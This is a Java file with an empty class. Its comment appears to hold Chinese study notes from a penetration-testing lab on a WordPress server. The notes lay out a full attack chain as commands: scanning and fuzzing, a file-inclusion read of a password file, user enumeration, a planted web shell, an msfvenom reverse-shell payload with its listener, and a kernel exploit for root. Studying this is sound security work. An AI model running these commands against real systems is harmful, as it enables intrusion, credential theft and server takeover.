package com.asa.hack;

public class A {

	/**
	 * 攻击WordPress的php的在linux下的服务器
	 * 
	 * 
	 * 
	 * 一，主机发现 nmap有一个带页面的工具，Zenmap 扫描网络中的c段，看能扫描出哪些机器 nmap -sP 192.168.112.1/24 nmap
	 * -sP 192.168.2.1/24
	 * 
	 * 端口扫描(扫window下的有点不好使) nmap -p 1-65535 -A 192.168.2.120
	 * 
	 * 
	 * 如果是完整可以考虑目录扫描 
	 * dirb http://192.168.2.120:8888/webgu/index -o zidian.txt
	 * 
	 * 
	 * curl http://192.168.2.120:8888/webgu/index
	 * 
	 * 去尝试拿静态信息，这有的存储信息可能会存到静态中 curl http://192.168.2.120:8888 -X .txt,.php,.zip
	 * 
	 * 
	 * Fuzz模糊测试
	 * 		找参数，sql注入，密码暴力破解
	 * 
	 * 
	 * 
	 * wfuzz -h
	 * 
	 * 
	 * wfuzz -W /usr/share/wfuzz/wordlist/general/common.txt http://192.168.142.138/index.php?FUZZ
	 * 
	 * 太多了，过滤一下
	 * wfuzz -W /usr/share/wfuzz/wordlist/general/common.txt --hw 12 http://192.168.142.138/index.php?FUZZ
	 * 
	 * 
	 * curl http://192.168.142.138/index.php?file=location.txt
	 * curl http://192.168.142.138/index.php?secrettier360=asa
	 * 
	 * curl http://192.168.142.138/image.php?secrettier360=/home/saket/password.txt
	 * 这个可以找到WordPress的PHP框架的用户密码
	 *  http://192.168.142.138/wordpress/
	 * 问题是用户名是什么
	 * http://192.168.142.138/wordpress/?author=1		查看有哪些用户
	 * 
	 * ssh -p 22 victor@192.168.142.138
	 * 
	 * 
	 * cmseek获取服务基础信息，比如服务的版本号
	 * cmseek -u http://192.168.2.120:8888/webgu/index
	 * wpscan --url http://192.168.142.138/wordpress/ --emumerate u
	 * 
	 * 
	 * 至此，WordPress的用户和密码都已经攻克了，但还需要攻克服务器的
	 * 考虑上传文件shell，为了注入木马
	 * 可以在Appearance主题修改中注入一句话木马
	 * 反弹连接，
	 * 
	 * 
	 * msf工具
	 * 		Metasploit
	 *		就是一个漏洞框架
	 * 		用msf生成一个php反弹连接的代码
	 * 		
	 * 		msfvenom -h
	 * 		payload免杀的代码，这里是展示php的，还有其他的代码方式，比如java
	 * 		msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.142.135 lport=7777 -o shell.php
	 * 		生成好了代码，把代码放入到目标php服务器中
	 * 
	 * 
	 * 		设置反弹连接的服务器
	 * 		msfconsole
	 * 			use exploit/multi/handler
				set payload php/meterpreter/reverse_tcp		目录
				set lhost 192.168.142.135		ip
				set lport 7777					端口
				exploit		开启服务
	 * 
	 * 		当目标机调用了反弹连接中的时候
	 * 		会触发这个服务在本地
	 * 		这是你就相当在目标机上了，但当期还是使用的php服务的人的权限账号
	 * 		getuid
	 * 		sysinfo
	 * 
	 * 	
	 * 
	 * 但是此时还没有获取root权限
	 * 		ls -a		看一下有哪些敏感文件
	 * 		find /-name
	 * 
	 * 		历史命令
	 * 		sudo -l
	 * 
	 * 
	 * 		操作系统内核漏洞提取权限（kali中操作）
	 * 		searchsploit 16.04 Ubuntu		查看一下可以用哪些脚本进行提取权限
	 * 		cd /usr/share/exploitdb/exploits/linux		脚本文件放在了这个目录下

	 * 		cp 45010.c /root
	 * 		gcc 45010.c	-o 45010	编译
	 * 
	 * 		（msfconsole窗口下）
	 * 		upload /root/45010 /tmp/45010	上传脚本
	 * 		shell
	 * 		cd /tmp
	 * 		chmod +x 45010
	 * 		./ 45010
	 * 		whoami		看自己是什么账号了，发现已经是root了
	 * 		ls -a	看一下有些什么文件
	 * 		cat root.txt	root的密码密文
	 * 
	 * 		
	 * 		
	 * 
	 * 
	 * 
	 * 
	 * PS：
	 * 下载文件
	 * sz file /usr/share/wfuzz/wordlist/general/common.txt
	 * 上传文件
	 * rz 
	 * cat /etc/passwd
	 * 
	 * 
	 * 
	 * 
	 * 
	 * 
	 * 
	 * 
	 * startup.cmd -m standalone
	 */

}
